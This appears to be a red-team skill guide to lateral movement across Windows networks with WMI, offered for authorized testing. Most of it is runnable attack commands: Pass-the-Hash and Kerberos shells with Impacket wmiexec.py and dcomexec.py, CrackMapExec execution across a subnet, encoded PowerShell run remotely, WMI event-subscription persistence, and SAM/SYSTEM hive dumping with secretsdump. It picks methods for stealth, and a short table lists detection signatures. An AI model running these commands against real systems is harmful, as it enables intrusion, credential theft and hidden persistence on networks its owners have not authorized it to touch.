\title{Performing Lateral Movement With Wmiexec}

\taxon{skill}

\tag{red-team}

\tag{lateral-movement}

\tag{wmiexec}

\tag{wmi}

\tag{post-exploitation}

\tag{impacket}

\tag{windows}

\meta{version}{"1.0"}

\meta{description}{Perform lateral movement across Windows networks using WMI-based remote execution techniques including Impacket wmiexec.py, CrackMapExec, and native WMI commands for stealthy post-exploitation during red team engagements.}

\subtree{
\title{Performing Lateral Movement with WMIExec}
\blockquote{\strong{Legal Notice:} This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.}

\subtree{
\title{Overview}
\p{WMI (Windows Management Instrumentation) is a legitimate Windows administration framework that red teams abuse for lateral movement because it provides remote command execution without deploying additional services or leaving obvious artifacts like PsExec. Impacket's wmiexec.py creates a semi-interactive shell over WMI by executing commands through Win32_Process.Create and reading output via temporary files on ADMIN$ share. Unlike PsExec, WMIExec does not install a service on the target, making it stealthier and less likely to trigger security alerts. WMI-based lateral movement maps to MITRE ATT&CK T1047 (Windows Management Instrumentation) and is used by threat actors including APT29, APT32, and Lazarus Group.}
}

\subtree{
\title{When to Use}
\ul{
\li{When conducting security assessments that involve performing lateral movement with wmiexec}
\li{When following incident response procedures for related security events}
\li{When performing scheduled security testing or auditing activities}
\li{When validating security controls through hands-on testing}
}
}

\subtree{
\title{Prerequisites}
\ul{
\li{Familiarity with red teaming concepts and tools}
\li{Access to a test or lab environment for safe execution}
\li{Python 3.8+ with required dependencies installed}
\li{Appropriate authorization for any testing activities}
}
}

\subtree{
\title{Objectives}
\ul{
\li{Execute remote commands on Windows targets using WMI-based techniques}
\li{Establish semi-interactive shells via Impacket wmiexec.py}
\li{Perform lateral movement with Pass-the-Hash using WMI}
\li{Use CrackMapExec for multi-target WMI command execution}
\li{Execute native PowerShell WMI commands for fileless lateral movement}
\li{Chain WMI with credential harvesting for network-wide access}
}
}

\subtree{
\title{MITRE ATT&CK Mapping}
\ul{
\li{\strong{T1047} - Windows Management Instrumentation}
\li{\strong{T1021.003} - Remote Services: Distributed Component Object Model (DCOM)}
\li{\strong{T1550.002} - Use Alternate Authentication Material: Pass the Hash}
\li{\strong{T1059.001} - Command and Scripting Interpreter: PowerShell}
\li{\strong{T1570} - Lateral Tool Transfer}
}
}

\subtree{
\title{Workflow}
\subtree{
\title{Phase 1: WMIExec with Impacket}
\ol{
\li{Execute a semi-interactive shell with credentials:}
}

\subtree{
\title{With NT hash (Pass-the-Hash)}
\p{wmiexec.py -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 domain.local/admin@10.10.10.50}
}

\subtree{
\title{With Kerberos ticket}
\p{export KRB5CCNAME=admin.ccache wmiexec.py -k -no-pass domain.local/admin@TARGET01.domain.local}
}

\subtree{
\title{Execute specific command (non-interactive)}
\p{wmiexec.py domain.local/admin:'Password123'@10.10.10.50 "ipconfig /all"}

\pre{\startverb
2. Execute commands without output file (stealthier using DCOM):
\stopverb}
}

\subtree{
\title{Using dcomexec.py as alternative (MMC20.Application DCOM object)}
\p{dcomexec.py -object MMC20 domain.local/admin:'Password123'@10.10.10.50}
}

\subtree{
\title{Using ShellWindows DCOM object}
\p{dcomexec.py -object ShellWindows domain.local/admin:'Password123'@10.10.10.50}

\pre{\startverb

\stopverb}
}
}

\subtree{
\title{Phase 2: CrackMapExec Multi-Target Execution}
\ol{
\li{Execute commands across multiple targets:}
}

\subtree{
\title{Execute with hash}
\p{crackmapexec wmi 10.10.10.0/24 -u admin -H a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -x "ipconfig"}
}

\subtree{
\title{Execute PowerShell command}
\p{crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123' -X "Get-Process"}
}

\subtree{
\title{Check local admin access via WMI}
\p{crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123'}

\pre{\startverb

\stopverb}
}
}

\subtree{
\title{Phase 3: Native WMI Commands (Windows)}
\ol{
\li{Execute remote commands using built-in Windows WMI tools:}
}

\subtree{
\title{Using PowerShell Invoke-WmiMethod}
\p{$cred = Get-Credential Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName 10.10.10.50 ` -Credential $cred -ArgumentList "cmd.exe /c ipconfig > C:\startverb \temp\stopverb\startverb \output\stopverb.txt"}
}

\subtree{
\title{Using CIM sessions (modern replacement for WMI)}
\p{$session = New-CimSession -ComputerName 10.10.10.50 -Credential $cred Invoke-CimMethod -CimSession $session -ClassName Win32_Process ` -MethodName Create -Arguments @{CommandLine="cmd.exe /c whoami"}}

\pre{\startverb
2. Fileless PowerShell execution via WMI:
\stopverb}
}

\subtree{
\title{Execute encoded PowerShell command remotely}
\p{$cmd = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Process | Out-File C:\startverb \temp\stopverb\startverb \procs\stopverb.txt')) Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName 10.10.10.50 ` -Credential $cred -ArgumentList "powershell.exe -enc $cmd"}

\pre{\startverb

\stopverb}
}
}

\subtree{
\title{Phase 4: WMI-Based Persistence}
\ol{
\li{Create WMI event subscriptions for persistence:}
}

\p{$consumer = Set-WmiInstance -Namespace "root\startverb \subscription\stopverb" -Class CommandLineEventConsumer ` -Arguments @{Name="PersistConsumer"; CommandLineTemplate="cmd.exe /c <payload>"}}

\p{Set-WmiInstance -Namespace "root\startverb \subscription\stopverb" -Class __FilterToConsumerBinding ` -Arguments @{Filter=$filter; Consumer=$consumer}}

\pre{\startverb

\stopverb}
}

\subtree{
\title{Phase 5: Chaining with Credential Harvesting}
\ol{
\li{Use WMI for remote credential extraction:}
}

\subtree{
\title{Download saved hives}
\p{smbclient.py domain.local/admin:'Password123'@10.10.10.50 > get C:\startverb \temp\stopverb\startverb \sam\stopverb > get C:\startverb \temp\stopverb\startverb \system\stopverb}
}

\subtree{
\title{Extract hashes from saved hives}
\p{secretsdump.py -sam sam -system system LOCAL}

\pre{\startverb

\stopverb}
}
}
}

\subtree{
\title{Tools and Resources}
\pre{\startverb
| Tool | Purpose | Platform |
|------|---------|----------|
| wmiexec.py | Semi-interactive WMI shell (Impacket) | Linux (Python) |
| dcomexec.py | DCOM-based remote execution (Impacket) | Linux (Python) |
| CrackMapExec | Multi-target WMI execution | Linux (Python) |
| wmic.exe | Native Windows WMI command-line tool | Windows |
| PowerShell CIM | Modern WMI cmdlets | Windows |
| SharpWMI | .NET WMI execution tool | Windows (.NET) |
\stopverb}
}

\subtree{
\title{WMI Execution Methods Comparison}
\pre{\startverb
| Method | Service Created | Output Method | Stealth Level |
|--------|----------------|---------------|---------------|
| wmiexec.py | No | Temp file on ADMIN$ | Medium |
| dcomexec.py | No | Temp file on ADMIN$ | Medium-High |
| wmic.exe | No | None (blind) or redirect | Medium |
| PowerShell WMI | No | None (blind) or redirect | High |
| PsExec (comparison) | Yes | Service output pipe | Low |
\stopverb}
}

\subtree{
\title{Detection Signatures}
\pre{\startverb
| Indicator | Detection Method |
|-----------|-----------------|
| Win32_Process.Create WMI calls | Event 4688 (process creation) with WMI parent process |
| WMI temporary output files on ADMIN$ | File monitoring on ADMIN$ share for temp files |
| Remote WMI connections (DCOM/135) | Network monitoring for DCOM traffic to workstations |
| WmiPrvSE.exe spawning cmd.exe/powershell.exe | EDR process tree analysis |
| Event 5857/5860/5861 | WMI Activity logs in Microsoft-Windows-WMI-Activity |
\stopverb}
}

\subtree{
\title{Validation Criteria}
\ul{
\li{[ ] WMIExec shell established on remote target}
\li{[ ] Pass-the-Hash execution validated via WMI}
\li{[ ] Multi-target command execution via CrackMapExec WMI}
\li{[ ] Native PowerShell WMI commands executed remotely}
\li{[ ] Credential harvesting performed via WMI execution chain}
\li{[ ] No service creation artifacts on target systems}
\li{[ ] Evidence documented with command outputs and screenshots}
}
}
}